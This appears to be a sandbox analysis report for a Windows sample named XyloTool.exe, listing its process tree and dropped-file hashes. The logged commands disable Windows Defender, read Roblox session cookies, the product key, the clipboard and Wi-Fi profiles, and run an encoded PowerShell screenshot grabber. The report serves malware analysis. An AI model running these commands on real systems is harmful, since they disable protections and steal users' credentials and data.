C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:752
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:8788
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:6300
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2000
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵PID:6500
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:8520
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4784 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:7368
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵PID:9116
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8212
-
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"1⤵
- Executes dropped EXE
PID:8912 -
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:9056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"3⤵PID:8548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:3512 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:8520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵PID:9100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:8748
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:8544
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:7304 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:8336
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:5648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4028
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2172 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:8932
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:7652
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4688
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:2404
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5816 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:8368
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1780 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:7888
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
PID:6728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccqxalhk\ccqxalhk.cmdline"5⤵PID:3152
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2482.tmp" "c:\Users\Admin\AppData\Local\Temp\ccqxalhk\CSCC41004D0810A437BB340FEF23CC46783.TMP"6⤵PID:8180
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3552
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:7408
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4436
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8552
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:8072
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4916
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:7428
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:996
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:464
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:7260
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:7876
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7408
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵PID:7948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵PID:7912
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:7480
-
C:\Windows\system32\getmac.exegetmac4⤵PID:8312
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI89122\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\jh09D.zip" *"3⤵PID:9020
-
C:\Users\Admin\AppData\Local\Temp\_MEI89122\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI89122\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\jh09D.zip" *4⤵
- Executes dropped EXE
PID:7260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:8088
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:8840
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:8304
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:8680
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:6048
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:8340
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:8016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵PID:8504
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3244
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1616 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:8560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵PID:7420
-
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"1⤵
- Executes dropped EXE
PID:8480 -
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"2⤵
- Executes dropped EXE
PID:8308
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f2a71b3e53e8f07bf6e77d46b77fb0d4
SHA14fbbe3c08a709facbe4c7df2dda78abdbec130a7
SHA2566ef4c0eb0603ebc221cce12aeba551b4ed2b4ec55992ec42fe70551ee49c1593
SHA512e7d69f582dd3af58dd0c1bea4d2fc29d40a53dcd6c137ef8106d206b842554610a3972bbdfa47e3dedfbc349432330f50ac856824442b0bacbdf05198a60ee34
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\activity-stream.discovery_stream.json.tmpFilesize
28KB
MD5f087b845200f14e4e7a393b4c45c6748
SHA15feea04f6f2cd98f21bbabd64c40fa36f6815e67
SHA25691a5ad440d1d728985924b652b5188211f6d46df9fd8822572688f93a94ba413
SHA51273f30ffaf4184920c6352a8ab850be4375905fd469b3d40bace9a72b773a552004717adfab7162fd2ed8a0fbab96d5fae4eb4494bfb412759259d8203f192a8b
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\cache2\doomed\11157Filesize
21KB
MD54ea6f774dc5aed99bb6fd0d8276cc14d
SHA158573da3b117e2fd3574ecf81d2f33e3a5a82dfd
SHA256d4535f6d2934c38f24aa89365b4377596beea779818f135733798d5bcd7ca417
SHA5124b3297fa814b3bae72507ccd54eb4983cd24229795ddcddb53b0b7e2fb3cb942e0ca9c6d31265faa6262d7e7599da253928442a336cabf388565fbe3d4917c21
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\cache2\doomed\13128Filesize
7KB
MD57c230e6f6b2b1a39ca3ef7210f3bb7fd
SHA106ebbe8c8c9659a06062e5a67f37792d4f94c641
SHA25629069912f05f0e50b749b138b66d42e709b52334c61445e8a8983faa6806fc01
SHA512c0e0d6c2404dcbd375e956d012b3de4eb38f74ee24e8243c4a70646417397e6f75c9c7cec427a136c001c63e11075ee06e0fb9542b723ee28fc3efc420bedfa3
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\cache2\doomed\15077Filesize
9KB
MD5fb3f6a93fc05849d90b744d9fad21567
SHA163f47516b57a8c0f09e78aaf0d6fc7d6d67581b7
SHA256bb4bc653466969b263d851c12194f0b9dfc97c35bab72d5c0701e460d93b7f83
SHA512231717fb2331fca2e98639a1cc02f263cab0ab27c877f3052c3625d09b52ae90cf917aae708a62962d7dc0f539e77ee75e9b2c4e1f13886fff35192d64d60923
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\cache2\doomed\15376Filesize
8KB
MD5869549d7980f940fc5b248452365dd12
SHA1cdb3d5e584384f12f6c5f8ae1a5db0218b4af961
